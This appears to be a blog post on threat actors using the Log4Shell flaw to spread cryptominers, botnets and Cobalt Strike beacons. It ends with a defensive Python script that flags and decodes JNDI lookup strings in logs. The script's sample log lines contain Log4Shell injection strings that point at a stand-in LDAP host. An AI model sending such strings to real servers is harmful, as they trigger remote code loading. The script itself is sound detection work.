“Log4Shell” Java Flaw Being Used To Deliver Malware & Crypto-Miners

Last Friday a super critical Java flaw called “Log4Shell” came to light and sent sysadmins scrambling to patch all the things. Websites around the world have been taken down so that the flaw could be patched, for example. And now we know why. According to Bleeping Computer, threat actors have been using the vulnerability to deliver crypto-miners, botnets, and penetration testing tools that could be used to deploy ransomware on affected systems:

As soon as the vulnerability was released, we saw threat actors exploiting the Log4Shell vulnerability to execute shell scripts that download and install various cryptominers, as shown below.

The threat actors behind the Kinsing backdoor and cryptomining botnet are heavily abusing the Log4j vulnerability with Base64 encoded payloads that have the vulnerable server download and execute shell scripts.


Netlab 360 reports that the threat actors exploit the vulnerability to install the Mirai and Muhstik malware on vulnerable devices.

These malware families recruit IoT devices and servers into their botnets and use them to deploy cryptominers and perform large-scale DDoS attacks.


The Microsoft Threat Intelligence Center reported that the Log4j vulnerabilities are also being exploited to drop Cobalt Strike beacons.

Cobalt Strike is a legitimate penetration testing toolkit where red teamers deploy agents, or beacons, on “compromised” devices to perform remote network surveillance or execute further commands.

However, threat actors commonly use cracked versions of Cobalt Strike as part of network breaches and during ransomware attacks. 

And finally:

In addition to using the Log4Shell exploits to install malware, threat actors and security researchers are using the exploit to scan for vulnerable servers and exfiltrate information from them.

So if you haven’t patched your infrastructure, you should get to it, as this flaw is clearly being exploited.
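
As an added example (not from the original post or from Bleeping Computer), here is a small log-triage script for the Base64-encoded payloads described above: it flags `${jndi:` lookup strings in log lines, including URL-encoded ones, and decodes any embedded Base64 command for review without executing it. The sample log lines, the documentation-range addresses, and the assumption that the encoded command follows a `/Base64/` path segment are all constructed for this example.

```python
import base64
import binascii
import re
from urllib.parse import unquote

# Matches a JNDI lookup up to its closing brace, case-insensitively.
JNDI_RE = re.compile(r"\$\{jndi:[^}]*\}", re.IGNORECASE)
# Assumption: the encoded command follows a "/Base64/" path segment.
B64_RE = re.compile(r"/Base64/([A-Za-z0-9+/]+={0,2})")


def triage_line(line):
    """Return (lookup, decoded_command_or_None) for each JNDI lookup in a log line."""
    findings = []
    # Access logs often record the request URL-encoded, so decode first.
    for lookup in JNDI_RE.findall(unquote(line)):
        decoded = None
        m = B64_RE.search(lookup)
        if m:
            try:
                raw = base64.b64decode(m.group(1), validate=True)
                decoded = raw.decode("utf-8", errors="replace")
            except (binascii.Error, ValueError):
                pass  # not valid Base64; still report the lookup itself
        findings.append((lookup, decoded))
    return findings


# Constructed sample log lines (documentation addresses, harmless command).
_CMD = base64.b64encode(b"echo constructed-sample").decode()
SAMPLE_LOG = [
    '198.51.100.7 - - "GET /health HTTP/1.1" 200 "curl/7.79"',
    '198.51.100.9 - - "GET / HTTP/1.1" 200 "${jndi:ldap://192.0.2.10:1389/Basic/Command/Base64/%s}"' % _CMD,
    '198.51.100.9 - - "GET /?q=%24%7Bjndi%3Aldap%3A%2F%2F192.0.2.10%2Fa%7D HTTP/1.1" 404 "-"',
]


def scan(lines):
    """Return {line_number: findings} for lines containing a JNDI lookup."""
    hits = {n: triage_line(line) for n, line in enumerate(lines, 1)}
    return {n: found for n, found in hits.items() if found}


if __name__ == "__main__":
    for n, found in scan(SAMPLE_LOG).items():
        for lookup, cmd in found:
            print(f"line {n}: {lookup} -> decoded: {cmd!r}")
```

A hit in the logs only shows that a lookup string was received, not that the host was vulnerable or that the command ran; treat decoded commands as leads for checking outbound connections and new processes on that host.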

One Response to ““Log4Shell” Java Flaw Being Used To Deliver Malware & Crypto-Miners”

  1. […] the planet scrambling to patch all the things last week before they were exploited by bad actors. Which is something that didn’t take long to happen. It’s now become a free for all as bad actors are really going to town in terms of exploiting […]
